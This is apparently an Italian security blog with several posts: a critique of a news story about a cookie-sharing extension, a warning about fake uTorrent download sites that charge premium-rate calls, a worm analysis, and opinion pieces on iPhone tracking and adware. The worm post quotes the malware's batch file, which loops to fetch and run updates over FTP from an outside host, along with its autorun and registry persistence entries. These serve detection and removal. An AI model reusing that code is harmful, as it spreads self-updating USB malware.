ago
25
Per mettere in pericolo la privacy
Author - Filed Under Web & Internet
Un interessante (sic!) articolo del corriere della sera parla di come proteggersi dalla raccolta di dati della nostra navigazione da parte di Google, illuminato (si spera) dittatore della rete.
Tra le varie opzioni si parla di Scookies, un estensione per Firefox. Cosa fa scookies secondo il giornalista? “Scookies cambia i cookie degli utenti mescolandoli gli uni agli altri. In questo modo vengono alterati i profili di ciascun utilizzatore intorbidendo il tracciato originale.” Quella che capisce una persona comune è che il risultato è positivo ma, il giornalista non spiega una cosa fondamentale: i cookie vengono scambiati e messi quindi a disposizione di perfetti sconosciuti, come riporta il sito stesso: “SCookies simply shares your cookies with other users that enabled it too.”.
Cosa si può fare un cookie l’ha dimostrato, in tempi recenti, Matteo Flora, con questa estensione si invierebbero i propri cookie a perfetti sconosciuti mettendo a repentaglio, per davvero, la nostra privacy.
Sul corriere dovrebbero contattare giornalisti più competenti, sull’articolo non c’è una sola riga che parli del rischio reale (non potenziale) di questo stratagemma. Scrivere un generico “Gli applicativi descritti non garantiscono una certezza riguardo la protezione della privacy” sembra più un modo per lavarsi le mani che un vero avviso.
ago
24
L’irresponsabile indicizzazione di Google
Author - Filed Under Software, Virus, Trojans & Worms, Web & Internet
Google indicizza nel bene e nel male ma, soprattutto nel male. Il sistema è, ovviamente, del tutto automatizzato e poco può fare se il sito che mette in cima alla “classifica” in realtà è fasullo per non dire pericoloso.
Succede così che si cerca il programma utorrent, che gestisce i file torrent, il primo sito che compare non è il sito originale ma un più enigmatico hxxp://www.utorrent.cc/it/ che propone il download del file. Mcaffe site advisor non segnala nulla (tranne un commento): http://www.siteadvisor.com/sites/utorrent.cc?ref=safe&client_ver=FF_26.6_6275&locale=it-IT&premium=false&client_type=FF&aff_id=0
Rassicurato sia dalla posizione (è il primo! Messo pure in evidenza!) e dal via libera di McAffe l’utente può scaricare il file ma, c’è una prima anomalia. Il file NON sembra lo stesso:
File scaricato:
File originale:
Tralasciando una rilevazione di AntiVir:
Confrontiamo un parametro per identificare meglio i files, cioè MD5.
File originale: 4ADD7DAE19AE850B29BF5F1B631BDA8A
File scaricato: 073A38D2AA5E2DF1668B71C0CD688248
Un poco diversi, quindi non sembrerebbe proprio lo stesso file ma, magari hanno solo cambiato la procedura di installazione. Il file scaricato una volta avviato fa comparire le schermate di installazione (che ricordano quelle italianeazel.com, di cui ho parlato tempo fa) e la licenza d’uso, che al paragrafo 1.1 riporta (in un italiano stentato):
“1.1. Attraverso il presente programa (qui di seguito chiamata “il programa”) gli utenti possono effettuare il download -dai nostri server al proprio hard disk- del file eseguibile che contiene il programma per computer selezionato (qui di seguito chiamato “il SOFTWARE”).
AVVISO PRELIMINARE: PER OGNI CHIAMATA DI SESSANTA SECONDI AL NUMERO 899022292, ALL’UTENTE DEL TELEFONO CELLULARE VERRÀ ADEBITATO UN IMPORTO DI SEIS E DIVIANNOVE EURO (IVA INCLUSA).”.
Al punto 3.4 inoltre:”3.4. Nel caso di una persona fisica, l’utente dichiara e garantisce a NETLINK NETWORK CORP. di essere maggiorenne.”
Qui si notano altre tre anomalie:
1. Perché in un software freeware come utorrent si parla di costi di chiamata telefonica?
2. Perché si deve dichiarare a “NETLINK NETWORK CORP.” di essere maggiorenni?
3. utorrent non appartiene a Bittorrent.inc?
A queste anomalie ecco la risposta! La successiva schermata (cliccare sul link) chiede di telefonare al 899022292 per ricevere un codice di installazione! Per il supporto si può anche visitare il sito hxxp://support.netlinkinvest.com. Inoltre viene contattato il sito
hxxp://utorrent.cc/it/check_code.php?CODE0= per testare il codice.
A me sembra speculare sulla pelle degli utenti poco accorti. Anche se non sembra esserci un malware tutto il sito è illegale. Non è però un caso isolato! Altri software famosi sono usati per svuotare in modo illecito i portafogli delle persone come CDburner xp (hxxp://www.cdburnerxpsoft.co).
Insomma, non c’è da stare allegri, Google dovrebbe controllare le proprie classifiche. Anche perché non sono casi isolati.
P.S. Per questi due software i siti originali sono:
http://www.utorrent.com/ per utorrent
http://cdburnerxp.se/ per cd burner xp
P.P.S. A volte il sito da me indicato non compare in cima ma, è comunque tra i link sponsorizzati.
ago
18
WORM_QUICKBATC.K, un worm che infetta i dispositivi removibili.
Author - Filed Under Virus, Trojans & Worms
E’ un Worm che si propaga attraverso i dispositivi removibili (pen, HD, lettori Mp3, ecc) in grado a sua volta di infettare quelli puliti. Lo scorso anno un simile malware rendeva inutilizzabili i dispositivi removibili; differenti gli eseguibili ed i valori aggiunti nel registro, ma uguale il risultato ottenuto. reper.exe questo il nome dell’eseguibile lanciato dall’autorun
[autorun]
open=reper.exe
ma anche
[autorun]
open=RavMon.exe
un altro esempio, vecchio di due anni, lo possiamo trovare spiegato all’interno del seguente link http://www.securityfocus.com/archive/88/437703/30/360/threaded
La tecnica dell’infezione non si discosta di molto da quella descritta in questo articolo e presente in questa variante del malware. Entriamo nei dettagli e capiamo come scoprire se il nostro computer è stato infettato. Crediamo inoltre che questo malware possa avere origini italiane:
una volta infettati possiamo avere un primo messaggio a video
cmd.exe – Disco non presente
Impossibile trovare il disco nell’unità. Inserire un disco nell’unità X
Annulla – Riprova – Continua
seguito da
Windows – Disco non presente
“Exception Processing message c0000013 parameters 75b1bf9c 4 75b1bf9c”
Annulla – Riprova – Continua
cliccando su uno qualsiasi dei tasti, la finestra si ripresenta.
Se si ricevono questi avvisi, basta controllare se è presente la cartella
%WinDir%\Installer\24ha12
se c’è, allora siete infetti. Avendo salvato copie di se stesso nei dispositivi removibili e nell’HD, a poco servirebbe ripulire solo uno di questi due; il worm è in grado di riprodursi e eseguirsi. Questo è uno dei file batch creati dal worm e che punta a ripristinare l’infezione nel sistema:
@shift
:begin
set winH=%systemroot%\Installer\24ha12
if exist %winH%\inet\stp exit
if exist %winH%\inet\intupdate\intupdate.bat del /b %winH%\inet\intupdate\intupdate.bat
ftp -v -i -s:”%winH%\inet\int2com.txt” ftp.digiland.it
if not exist %winH%\inet\slp2.exe copy %myfiles%\sleep.exe, %winH%\inet\slp2.exe
start /b /wait %winH%\inet\slp2.exe 900
if exist %winH%\inet\intupdate\intupdate.bat call %winH%\inet\intupdate\intupdate.bat
goto begin
questo è il contenuto dell’autorun.inf:
action= Apri cartella per visualizzare i file
shell\Auto\command=hvNrtID.exe
shell=Auto
dove la directory
%myfiles% è %UserProfile%\Impostazioni locali\Data applicazioni
e i files hvNrtID.exe e autorun.inf si trovano sia nelle unità removibili infette che nell’HD. Per poter essere eseguito all’avvio aggiunge i seguenti valori
N_prog=%SysDir%\N_prog.exe
str_insDr=%WinDir%\Installer\24ha12\Ic2d\str_insDr.exe
in
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Per rimuoverlo è stato creato da SuspectFile un fix_tool. Il tool è prelevabile all’interno del nostro forum nella sezione “Tools” visitando questa discussione: http://www.suspectfile.com/forum/viewtopic.php?f=8&t=2544
Deifobe & amvinfe
ago
14
La scoperta dell’acqua calda
Author - Filed Under Uncategorized
Steve Jobs ammette che il nuovissimo ed (in)utilissimo iPhone traccia e spia i propri utilizzatori. Scatta subito la, giusta, ira dei consumatori di cui Adusbef e Federconsumatori fanno da condottieri.
Pesanti accuse insomma, che fanno dalla violazione della privacy all’uso di malware (dov’era scritto nella licenza d’uso che c’era questa monitoraggio?). Mondo dell’informatica sconvolto? Macché! Basta cercare sul sito di Paolo Attivissimo, dove è presente un articolo dell’8 Luglio che parla dell’implementazione del Trusted Computing sull’iPhone.
Il Trusted Computing, in parole povere, è una serie di congegni (hardware e software) che si comportano come dei guardiani, cioè consentono l’uso di software/hardware preventivamente autorizzato. Detto così sembra anche qualcosa di positivo ma, l’autorizzazione non la crea l’utente ma, solo i big del mondo dell’informatica. Tralasciando le varie implicazioni (fine dei software freeware) significa limitare pesantemente l’uso di qualsiasi apparecchio elettronico. Tuttavia, ha anche altre funzioni. Altro possibile scopo è il monitoraggio continuo del computer dell’utente per escludere eventuali manomissioni .
Nel nostro caso si è mostrato in tutta la sua “potenza”. Oltre a limitare l’uso del prodotto, spia anche i singoli utenti per assicurare che non vi siano alterazioni del chip che gestisce il sistema.
Insomma, chi era un poco informato avrebbe fiutato la minaccia ben prima delle ammissioni di Jobs. Questo fa anche riflettere sul fatto che questi apparecchi non vengono minimamente controllati sotto l’aspetto della privacy né tanto meno usati da persone competenti prima dell’immissione sul mercato.
Positivo invece che il tutto non sia rimasto in sordina, anche se da anni si denunciano i rischi inerenti al TC.
P.S. L’articolo è dello stesso autore che l’ha pubblicato Su Open world blog.
ago
7
Svarioni e malware
Author - Filed Under Software, Virus, Trojans & Worms
A volte, le case antivirus risultano un po’ troppo zelanti e poco accorte allo stesso tempo nel catalogare i file come infetti.
Malware, infatti, è un software creato “con il solo scopo di causare danni” (definizione tratta da wikipedia) e installato contro la volontà dell’utente. Questo vuol dire che un eventuale programma di “pop-up” regolarmente segnalato tramite la licenza d’uso (che non si legge mai) all’interno di un qualsiasi software non è proprio malware, perché, a differenza di altre minacce, si acconsente all’installazione dello stesso.
Questo il caso di MP3 CD extractor, un programma per l’estrazione delle tracce audio, rilevato come infetto da 10 antivirus. Le identificazioni parlano di trojan downloader e backdoor. Minacce pesanti per la sicurezza del nostro computer ma, la cosa non è proprio così.
Nel sito, che non scrivo per evitare pubblicità, viene detto che il programma è freeware e si invita la lettura della licenza per eventuali informazioni. Nella licenza c’è un paragrafo intero che come titolo ha:
5. Display of electronic advertisements
[...]you agree that the
Software may display advertisements on your computer and send some
information, such as the URLs you visit or the text on the page to
show contextual or not contextual advertisement without any compensation to
you.[...]
Uomo avvisato…. uomo avvisato!
Nessun malware ma, un ad-ware, palesemente dichiarato, che non giustifica certo le rilevazioni delle aziende.
Ma, una cosa stona: è la dichiarazione dei proprietari del sito che assicurano l’assenza di spyware e ad-ware. L’ad-ware c’è però (legale o meno) e minaccia la privacy. Una correzione in “potenzialmente pericoloso” da parte delle varie aziende sarebbe più che doverosa. nei confronti degli utenti in primis.